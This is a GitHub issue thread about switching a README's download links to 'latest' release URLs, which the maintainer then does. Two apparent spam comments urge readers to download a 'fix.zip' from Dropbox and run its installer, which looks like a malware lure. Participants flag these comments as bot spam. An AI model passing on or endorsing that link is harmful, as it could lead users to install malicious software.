### ISSUE TITLE
In `readMe.MD`, embed vanity URIs instead of hardcoded versions for "latest" downloads.

### ISSUE THREAD

**Issue by RokeJulianLockhart** [ThioJoe/Windows-Super-God-Mode#11]
Currently, https://github.com/ThioJoe/Windows-Super-God-Mode/blob/83c2e5559a884516f03b2716471b02a4172cfb20/README.md#how-to-run hardcodes https://github.com/ThioJoe/Windows-Super-God-Mode/releases/tag/v1.1.0. However, there's no need to update the `readMe` when you push a new release if you use https://github.com/ThioJoe/Windows-Super-God-Mode/releases/latest instead.

**Comment by llowvxe** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by RokeJulianLockhart** [comment]
> https://github.com/ThioJoe/Windows-Super-God-Mode/issues/11#issuecomment-2309100327

@llowvxe, I'm gonna report your comment for spam, because I have no idea how that relates to my issue.

**Comment by pilot5657** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by KarbitsCode** [comment]
What is going on here? 🤨

**Comment by ThioJoe** [comment]
Bot spam i think

**Comment by ThioJoe** [comment]
Readme now uses the latest version links:
`https://github.com/ThioJoe/Windows-Super-God-Mode/releases/latest/download/Super_God_Mode.ps1`
`https://github.com/ThioJoe/Windows-Super-God-Mode/releases/latest/download/SuperGodMode-EasyLauncher.bat`
